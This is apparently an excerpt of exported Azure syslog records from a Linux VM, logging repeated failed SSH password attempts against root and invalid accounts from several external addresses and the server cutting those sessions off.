+15168,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:18:37,UbuntuDevEnv,2019-06-26 05:18:37,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,8579,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15169,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:18:37,UbuntuDevEnv,2019-06-26 05:18:37,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,8579,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+15170,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:18:40,UbuntuDevEnv,2019-06-26 05:18:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,8663,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15171,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:18:42,UbuntuDevEnv,2019-06-26 05:18:42,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 52957 ssh2,8663,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,52957,,
+15172,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:18:47,UbuntuDevEnv,2019-06-26 05:18:45,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 52957 ssh2,8663,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,52957,,
+15173,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:18:48,UbuntuDevEnv,2019-06-26 05:18:48,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 52957 ssh2,8663,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,52957,,
+15174,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:18:53,UbuntuDevEnv,2019-06-26 05:18:53,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 58.242.82.13 port 52957 ssh2],8663,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,52957,,
+15175,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:18:56,UbuntuDevEnv,2019-06-26 05:18:56,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 52957 ssh2 [preauth],8663,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,52957,,
+15176,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:18:56,UbuntuDevEnv,2019-06-26 05:18:56,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 52957 ssh2,8663,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,52957,,
+15177,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:18:56,UbuntuDevEnv,2019-06-26 05:18:56,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 52957: Too many authentication failures [preauth],8663,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,52957,,
+15178,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:18:56,UbuntuDevEnv,2019-06-26 05:18:56,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,8663,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+15179,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:18:56,UbuntuDevEnv,2019-06-26 05:18:56,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,8663,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15180,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:00,UbuntuDevEnv,2019-06-26 05:19:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,8807,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15181,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:01,UbuntuDevEnv,2019-06-26 05:19:01,auth,UbuntuDevEnv,info,Invalid user steamuser from 140.143.223.242 port 42464,8706,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,steamuser,140.143.223.2,42464,,
+15182,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:01,UbuntuDevEnv,2019-06-26 05:19:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,8706,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15183,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:01,UbuntuDevEnv,2019-06-26 05:19:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=140.143.223.242,8706,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,140.143.223.2,,0,
+15184,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:02,UbuntuDevEnv,2019-06-26 05:19:01,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 60477 ssh2,8807,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,60477,,
+15185,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:03,UbuntuDevEnv,2019-06-26 05:19:02,auth,UbuntuDevEnv,info,Failed password for invalid user steamuser from 140.143.223.242 port 42464 ssh2,8706,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,steamuser,140.143.223.2,42464,,
+15186,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:05,UbuntuDevEnv,2019-06-26 05:19:04,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 60477 ssh2,8807,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,60477,,
+15187,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:05,UbuntuDevEnv,2019-06-26 05:19:05,auth,UbuntuDevEnv,info,Disconnected from invalid user steamuser 140.143.223.242 port 42464 [preauth],8706,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,steamuser,140.143.223.2,42464,,
+15188,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:05,UbuntuDevEnv,2019-06-26 05:19:05,auth,UbuntuDevEnv,info,Received disconnect from 140.143.223.242 port 42464:11: Bye Bye [preauth],8706,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,140.143.223.2,42464,,
+15189,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:08,UbuntuDevEnv,2019-06-26 05:19:07,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 60477 ssh2,8807,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,60477,,
+15190,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:10,UbuntuDevEnv,2019-06-26 05:19:10,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 60477 ssh2,8807,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,60477,,
+15191,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:16,UbuntuDevEnv,2019-06-26 05:19:16,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 58.242.82.13 port 60477 ssh2],8807,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,60477,,
+15192,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:16,UbuntuDevEnv,2019-06-26 05:19:16,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 60477 ssh2 [preauth],8807,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,60477,,
+15193,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:16,UbuntuDevEnv,2019-06-26 05:19:16,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,8807,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15194,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:16,UbuntuDevEnv,2019-06-26 05:19:16,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,8807,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+15195,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:16,UbuntuDevEnv,2019-06-26 05:19:16,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 60477: Too many authentication failures [preauth],8807,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,60477,,
+15196,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:20,UbuntuDevEnv,2019-06-26 05:19:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,8883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15197,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:21,UbuntuDevEnv,2019-06-26 05:19:21,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 3710 ssh2,8883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,3710,,
+15198,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:22,UbuntuDevEnv,2019-06-26 05:19:21,auth,UbuntuDevEnv,info,Invalid user visitation from 196.41.208.238 port 28027,8895,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,visitation,196.41.208.2,28027,,
+15199,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:22,UbuntuDevEnv,2019-06-26 05:19:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,8895,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15200,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:22,UbuntuDevEnv,2019-06-26 05:19:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.41.208.238,8895,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.41.208.2,,0,
+15201,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:24,UbuntuDevEnv,2019-06-26 05:19:24,auth,UbuntuDevEnv,info,Failed password for invalid user visitation from 196.41.208.238 port 28027 ssh2,8895,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,visitation,196.41.208.2,28027,,
+15202,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:24,UbuntuDevEnv,2019-06-26 05:19:24,auth,UbuntuDevEnv,info,Received disconnect from 196.41.208.238 port 28027:11: Bye Bye [preauth],8895,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.41.208.2,28027,,
+15203,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:24,UbuntuDevEnv,2019-06-26 05:19:24,auth,UbuntuDevEnv,info,Disconnected from invalid user visitation 196.41.208.238 port 28027 [preauth],8895,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,visitation,196.41.208.2,28027,,
+15204,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:25,UbuntuDevEnv,2019-06-26 05:19:25,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 3710 ssh2,8883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,3710,,
+15205,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:38,UbuntuDevEnv,2019-06-26 05:19:37,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 58.242.82.13 port 3710 ssh2],8883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,3710,,
+15206,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:38,UbuntuDevEnv,2019-06-26 05:19:37,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 3710: Too many authentication failures [preauth],8883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,3710,,
+15207,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:38,UbuntuDevEnv,2019-06-26 05:19:37,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 3710 ssh2 [preauth],8883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,3710,,
+15208,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:38,UbuntuDevEnv,2019-06-26 05:19:37,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,8883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15209,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:38,UbuntuDevEnv,2019-06-26 05:19:37,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,8883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+15210,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:41,UbuntuDevEnv,2019-06-26 05:19:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,8962,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15211,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:44,UbuntuDevEnv,2019-06-26 05:19:43,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 11856 ssh2,8962,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,11856,,
+15212,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:48,UbuntuDevEnv,2019-06-26 05:19:47,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 11856 ssh2,8962,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,11856,,
+15213,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:59,UbuntuDevEnv,2019-06-26 05:19:59,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 58.242.82.13 port 11856 ssh2],8962,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,11856,,
+15214,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:59,UbuntuDevEnv,2019-06-26 05:19:59,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 11856 ssh2 [preauth],8962,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,11856,,
+15215,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:59,UbuntuDevEnv,2019-06-26 05:19:59,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,8962,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15216,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:59,UbuntuDevEnv,2019-06-26 05:19:59,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,8962,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+15217,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:19:59,UbuntuDevEnv,2019-06-26 05:19:59,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 11856: Too many authentication failures [preauth],8962,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,11856,,
+15218,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:20:06,UbuntuDevEnv,2019-06-26 05:20:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,9055,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15219,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:20:08,UbuntuDevEnv,2019-06-26 05:20:08,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 21350 ssh2,9055,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,21350,,
+15220,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:20:26,UbuntuDevEnv,2019-06-26 05:20:26,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 58.242.82.13 port 21350 ssh2],9055,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,21350,,
+15221,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:20:26,UbuntuDevEnv,2019-06-26 05:20:26,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,9055,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15222,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:20:26,UbuntuDevEnv,2019-06-26 05:20:26,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,9055,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+15223,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:20:26,UbuntuDevEnv,2019-06-26 05:20:26,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 21350: Too many authentication failures [preauth],9055,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,21350,,
+15224,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:20:26,UbuntuDevEnv,2019-06-26 05:20:26,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 21350 ssh2 [preauth],9055,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,21350,,
+15225,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:20:40,UbuntuDevEnv,2019-06-26 05:20:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,9152,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15226,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:20:42,UbuntuDevEnv,2019-06-26 05:20:42,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 31212 ssh2,9152,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,31212,,
